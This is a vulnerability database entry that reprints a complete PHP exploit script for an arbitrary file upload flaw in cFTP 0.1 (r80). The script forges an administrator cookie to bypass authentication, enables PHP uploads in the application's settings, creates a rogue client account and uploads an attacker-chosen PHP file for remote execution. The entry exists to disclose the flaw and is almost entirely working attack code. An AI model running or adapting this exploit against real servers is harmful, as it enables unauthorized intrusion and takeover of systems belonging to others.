cFTP <= 0.1 (r80) Arbitrary File Upload

🗓️ 01 Jul 2014 00:00:00Reported by RootType
cFTP <= 0.1 (r80) Arbitrary File Upload vulnerability in linux environment caused by the cFTP application allowing arbitrary file uploads through a vulnerable URL

                                                &#60;?php
# Exploit Title: cFTP &#60;= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : &#60;https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78&#62;)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux

// Vulnerable URL
$url = &#39;http://[url domain]/cFTP/&#39;;

// The file to upload
$filename = dirname(__FILE__).&#39;/info.php&#39;;


$failext = array(&#39;php&#39;, &#39;pl&#39;);
$username = &#39;hackname&#39;.rand(0, 999999);
$cookies_injection = &#39;access=admin; userlevel=9&#39;; // &#60;-- the big error of this app :-)

/**
 * Call URL
 */
function curl_call_url($url, $cookies_injection, $inputs = null)
{
  $curl = curl_init();
  
  curl_setopt($curl, CURLOPT_URL, $url);
  curl_setopt($curl, CURLOPT_HEADER, false);
  curl_setopt($curl, CURLOPT_POST, true);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection);
  
  if (is_array($inputs) === true) {
    curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs);
  }
  
  $response = curl_exec($curl);
  $headers = curl_getinfo($curl);
  $error_number   = curl_errno($curl);
  $error_message  = curl_error($curl);
  
  curl_close($curl);
  
  return array($response, $headers, $error_number, $error_message);
}

// Add vulnerable extensions (php, pl : defined in $failext)
list($response, $headers, $error_number, $error_message) = curl_call_url($url.&#39;options.php&#39;, $cookies_injection);

if (preg_match_all(&#39;/&#60;input([^&#62;]+)name=&#34;([^&#34;]+)&#34;([^&#62;]+)value=&#34;([^&#34;]+)([^&#62;]*)&#62;/&#39;, $response, $matches)) {
  $input = array();
  $count = count($matches[0]);
  for ($i = 0; $i &#60; $count; $i++) {
    $input[$matches[2][$i]] = $matches[4][$i];
    if ($matches[2][$i] === &#39;allowed_file_types&#39;) {
      foreach ($failext as $ext) {
        if (strpos($matches[4][$i], $ext) === false) {
          $input[$matches[2][$i]] .= &#39;,&#39;.$ext;
        }
      }
      $input[$matches[2][$i]] = str_replace(&#39;,&#39;, &#39;|&#39;, $input[$matches[2][$i]]);
    }
  }
  
  // add select
  if (preg_match(&#39;/&#60;option selected=&#34;selected&#34; value=&#34;([^&#34;]+)&#34;/&#39;, $response, $matches)) {
    $input[&#39;timezone&#39;] = $matches[1];
  } else {
    $input[&#39;timezone&#39;] = &#39;America/Argentina/Buenos_Aires&#39;;
  }
  
  // Validate the form to add the vulnerables extensions
  list($response, $headers, $error_number, $error_message) = curl_call_url($url.&#39;options.php&#39;, $cookies_injection, $input);
  
  if (strpos($response, &#39;message_ok&#39;) !== false) {
    // Add new client : required to upload the file
    $input = array(
      &#39;add_client_form_name&#39; =&#62; $username,
      &#39;add_client_form_user&#39; =&#62; $username,
      &#39;add_client_form_pass&#39; =&#62; &#39;hackname&#39;,
      &#39;add_client_form_pass2&#39; =&#62; &#39;hackname&#39;,
      &#39;add_client_form_address&#39; =&#62; &#39;my address&#39;,
      &#39;add_client_form_phone&#39; =&#62; &#39;000-000-000&#39;,
      //&#39;add_client_form_notify&#39; =&#62; &#39;0&#39;,
      &#39;add_client_form_email&#39; =&#62; $username.&#39;@example.com&#39;,
      &#39;add_client_form_intcont&#39; =&#62; &#39;&#39;,
      &#39;Submit&#39; =&#62; &#39;Create account&#39;,
    );
    
    list($response, $headers, $error_number, $error_message) = curl_call_url($url.&#39;clientform.php&#39;, $cookies_injection, $input);
    
    if (strpos($response, &#39;message_ok&#39;) !== false) {
      // Now upload file :-)
      $input = array(
        &#39;name&#39; =&#62; &#39;my_hack_file&#39;,
        &#39;description&#39; =&#62; &#39;It\&#39;s my hack file&#39;,
        &#39;clientname&#39; =&#62; $username,
        &#39;ufile&#39; =&#62; &#39;@&#39;.$filename,
        &#39;Submit&#39; =&#62; &#39;Upload&#39;,
      );
      
      list($response, $headers, $error_number, $error_message) = curl_call_url($url.&#39;fileupload.php&#39;, $cookies_injection, $input);
      
      if (preg_match(&#39;#&#60;a href=&#34;([^&#34;]+)&#34;&#62;File uploaded correctly#&#39;, $response, $matches)) {
        // get filename
        list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
        
        if (preg_match(&#39;#&#60;a href=&#34;([^&#34;]+)&#39;.basename($filename).&#39;&#34; target=&#34;_blank&#34;#&#39;, $response, $matches_end)) {
          echo &#39;Your file is here : &#39;.$url.$matches[1].$matches_end[1].basename($filename);
        } else {
          var_dump($response);
          echo &#39;fail to hack : where is the file !!!&#39;;
        }
      } else {
        var_dump($response);
        echo &#39;fail to hack : file not uploaded&#39;;
      }
    } else {
      var_dump($response);
      echo &#39;fail to hack : client not created&#39;;
    }
    
  } else {
    var_dump($response);
    echo &#39;fail to hack : options not changed&#39;;
  }
  
} else {
  var_dump($response);
  echo &#39;fail to hack : no input&#39;;
}
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1